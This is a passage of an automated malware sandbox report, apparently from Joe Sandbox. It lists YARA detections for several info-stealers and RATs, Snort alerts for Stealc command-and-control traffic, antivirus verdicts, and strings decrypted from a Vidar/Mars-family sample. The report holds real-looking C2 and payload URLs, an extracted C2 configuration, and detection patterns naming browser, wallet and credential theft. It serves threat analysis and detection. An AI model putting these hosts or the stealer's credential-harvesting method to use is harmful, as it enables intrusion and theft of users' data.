3.2.cmd.exe.60900c8.8.raw.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb864a:$s14: keybd_event 0xbf3b9:$v1_1: grabber@ 0xb921c:$v1_2: <BrowserProfile>k__ 0xb9c95:$v1_3: <SystemHardwares>k__ 0xb9d54:$v1_5: <ScannedWallets>k__ 0xb9de4:$v1_6: <DicrFiles>k__ 0xb9dc0:$v1_7: <MessageClientFiles>k__ 0xba18a:$v1_8: <ScanBrowsers>k__BackingField 0xba1dc:$v1_8: <ScanWallets>k__BackingField 0xba1f9:$v1_8: <ScanScreen>k__BackingField 0xba233:$v1_8: <ScanVPN>k__BackingField 0xaba62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xab36e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
1.3.u5c4.0.exe.4300000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.u5c4.0.exe.4300000.0.raw.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
13.2.run.exe.37f915b.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
13.2.run.exe.37f915b.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
3.2.cmd.exe.5681976.6.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
3.2.cmd.exe.5681976.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x615ec:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x61677:$s1: CoGetObject 0x615d0:$s2: Elevation:Administrator!new:
17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f79a0000.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.cmd.exe.5dd00c8.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.cmd.exe.5dd00c8.7.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
15.2.cmd.exe.5dd00c8.7.unpack	MALWARE_Win_Arechclient2	Detects Arechclient2 RAT	ditekSHen	0xb684a:$s14: keybd_event 0xbd5b9:$v1_1: grabber@ 0xb741c:$v1_2: <BrowserProfile>k__ 0xb7e95:$v1_3: <SystemHardwares>k__ 0xb7f54:$v1_5: <ScannedWallets>k__ 0xb7fe4:$v1_6: <DicrFiles>k__ 0xb7fc0:$v1_7: <MessageClientFiles>k__ 0xb838a:$v1_8: <ScanBrowsers>k__BackingField 0xb83dc:$v1_8: <ScanWallets>k__BackingField 0xb83f9:$v1_8: <ScanScreen>k__BackingField 0xb8433:$v1_8: <ScanVPN>k__BackingField 0xa9c62:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost 0xa956e:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
1.2.u5c4.0.exe.42d0e67.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.2.u5c4.0.exe.42d0e67.1.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
2.2.run.exe.455115b.7.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
2.2.run.exe.455115b.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcfe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd89:$s1: CoGetObject 0x1dce2:$s2: Elevation:Administrator!new:
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a1537d.8.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a1537d.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a1537d.8.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x21d805:$s1: file:/// 0x21d711:$s2: {11111-22222-10009-11112} 0x21d795:$s3: {11111-22222-50001-00000} 0x21ba10:$s4: get_Module 0x5679d:$s5: Reverse 0x21bd3d:$s5: Reverse 0x5b3e4:$s6: BlockCopy 0x218c1a:$s6: BlockCopy 0x56ce2:$s7: ReadByte 0x21d817:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x366b8f:$s1: file:/// 0x366a9f:$s2: {11111-22222-10009-11112} 0x366b1f:$s3: {11111-22222-50001-00000} 0x1d94f2:$s4: get_Module 0x2de704:$s4: get_Module 0x364d52:$s4: get_Module 0x1da945:$s5: Reverse 0x21adb9:$s5: Reverse 0x365038:$s5: Reverse 0x2eaa1d:$s6: BlockCopy 0x3834a6:$s6: BlockCopy 0x2e0be8:$s7: ReadByte 0x366ba1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
5.0.u5c4.3.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a247a3.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a247a3.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a247a3.1.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x20e3df:$s1: file:/// 0x20e2eb:$s2: {11111-22222-10009-11112} 0x20e36f:$s3: {11111-22222-50001-00000} 0x20c5ea:$s4: get_Module 0x47377:$s5: Reverse 0x20c917:$s5: Reverse 0x4bfbe:$s6: BlockCopy 0x2097f4:$s6: BlockCopy 0x478bc:$s7: ReadByte 0x20e3f1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x33fd85:$s1: file:/// 0x33fc95:$s2: {11111-22222-10009-11112} 0x33fd15:$s3: {11111-22222-50001-00000} 0x1b26e8:$s4: get_Module 0x2b78fa:$s4: get_Module 0x33df48:$s4: get_Module 0x1b3b3b:$s5: Reverse 0x1f3faf:$s5: Reverse 0x33e22e:$s5: Reverse 0x2c3c13:$s6: BlockCopy 0x35c69c:$s6: BlockCopy 0x2b9dde:$s7: ReadByte 0x33fd97:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a34dad.6.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a34dad.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a34dad.6.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x1fddd5:$s1: file:/// 0x1fdce1:$s2: {11111-22222-10009-11112} 0x1fdd65:$s3: {11111-22222-50001-00000} 0x1fbfe0:$s4: get_Module 0x36d6d:$s5: Reverse 0x1fc30d:$s5: Reverse 0x3b9b4:$s6: BlockCopy 0x1f91ea:$s6: BlockCopy 0x372b2:$s7: ReadByte 0x1fdde7:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x31b97b:$s1: file:/// 0x31b88b:$s2: {11111-22222-10009-11112} 0x31b90b:$s3: {11111-22222-50001-00000} 0x18e2de:$s4: get_Module 0x2934f0:$s4: get_Module 0x319b3e:$s4: get_Module 0x18f731:$s5: Reverse 0x1cfba5:$s5: Reverse 0x319e24:$s5: Reverse 0x29f809:$s6: BlockCopy 0x338292:$s6: BlockCopy 0x2959d4:$s7: ReadByte 0x31b98d:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
Click to see the 73 entries

Snort Signatures

ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) - Source IP: 192.168.2.4 - Destination IP: 185.172.128.90

Timestamp:	04/27/24-00:45:59.672340
SID:	2856233
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.4 - Destination IP: 185.172.128.76

Timestamp:	04/27/24-00:46:04.983919
SID:	2044243
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.4 - Destination IP: 185.172.128.76

Timestamp:	04/27/24-00:46:05.537147
SID:	2044244
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 - Source IP: 185.172.128.76 - Destination IP: 192.168.2.4

Timestamp:	04/27/24-00:46:05.819615
SID:	2051828
Source Port:	80
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.4 - Destination IP: 185.172.128.76

Timestamp:	04/27/24-00:46:05.948628
SID:	2044246
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://185.172.128.59/syncUpd.exe	Avira URL Cloud: Label: malware
Source: http://185.172.128.203/tiktok.exe	Avira URL Cloud: Label: malware
Source: http://185.172.128.228/ping.php?substr=eight	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\pasb	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\khjsru	Avira: detection malicious, Label: HEUR/AGEN.1307453

Found malware configuration

Source: 00000001.00000003.1743780115.0000000004300000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\khjsru	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\pasb	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\UIxMarketPlugin.dll	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	ReversingLabs: Detection: 18%

Multi AV Scanner detection for submitted file

Source: kO1P1YnLst.exe

ReversingLabs: Detection: 50%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\pasb	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\khjsru	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: kO1P1YnLst.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetProcAddress
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: LoadLibraryA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: lstrcatA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: OpenEventA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CreateEventA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CloseHandle
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Sleep
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: VirtualFree
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetSystemInfo
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: VirtualAlloc
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: HeapAlloc
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetComputerNameA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: lstrcpyA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetProcessHeap
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetCurrentProcess
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: lstrlenA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: ExitProcess
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetSystemTime
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: advapi32.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: gdi32.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: user32.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: crypt32.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: ntdll.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetUserNameA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CreateDCA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetDeviceCaps
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: ReleaseDC
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: sscanf
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: VMwareVMware
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: HAL9TH
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: JohnDoe
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: DISPLAY
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: http://185.172.128.76
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: /3cd2b41cbde8fc9c.php
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: /15f649199f40275b/
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: default10
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetFileAttributesA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GlobalLock
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: HeapFree
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetFileSize
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GlobalSize
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: IsWow64Process
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Process32Next
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetLocalTime
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: FreeLibrary
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetVolumeInformationA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Process32First
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetLocaleInfoA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetModuleFileNameA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: DeleteFileA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: FindNextFileA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: LocalFree
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: FindClose
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: LocalAlloc
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetFileSizeEx
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: ReadFile
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: SetFilePointer
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: WriteFile
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CreateFileA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: FindFirstFileA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CopyFileA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: VirtualProtect
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetLastError
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: lstrcpynA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: MultiByteToWideChar
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GlobalFree
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: WideCharToMultiByte
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GlobalAlloc
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: OpenProcess
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: TerminateProcess
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetCurrentProcessId
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: gdiplus.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: ole32.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: bcrypt.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: wininet.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: shlwapi.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: shell32.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: psapi.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: rstrtmgr.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: SelectObject
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: BitBlt
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: DeleteObject
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CreateCompatibleDC
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GdiplusStartup
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GdiplusShutdown
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GdipDisposeImage
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GdipFree
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CoUninitialize
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CoInitialize
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CoCreateInstance
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: BCryptDecrypt
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: BCryptSetProperty
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: BCryptDestroyKey
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetWindowRect
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetDesktopWindow
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetDC
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CloseWindow
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: wsprintfA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CharToOemW
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: wsprintfW
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: RegQueryValueExA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: RegEnumKeyExA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: RegOpenKeyExA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: RegCloseKey
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: RegEnumValueA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CryptUnprotectData
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: SHGetFolderPathA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: ShellExecuteExA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: InternetOpenUrlA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: InternetConnectA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: InternetCloseHandle
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: InternetOpenA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: HttpSendRequestA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: HttpOpenRequestA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: InternetReadFile
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: InternetCrackUrlA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: StrCmpCA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: StrStrA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: StrCmpCW
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: PathMatchSpecA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: RmStartSession
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: RmRegisterResources
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: RmGetList
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: RmEndSession
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: sqlite3_open
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: sqlite3_step
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: sqlite3_column_text
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: sqlite3_finalize
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: sqlite3_close
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: sqlite3_column_blob
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: encrypted_key
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: PATH
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: NSS_Init
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: NSS_Shutdown
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: PK11_FreeSlot
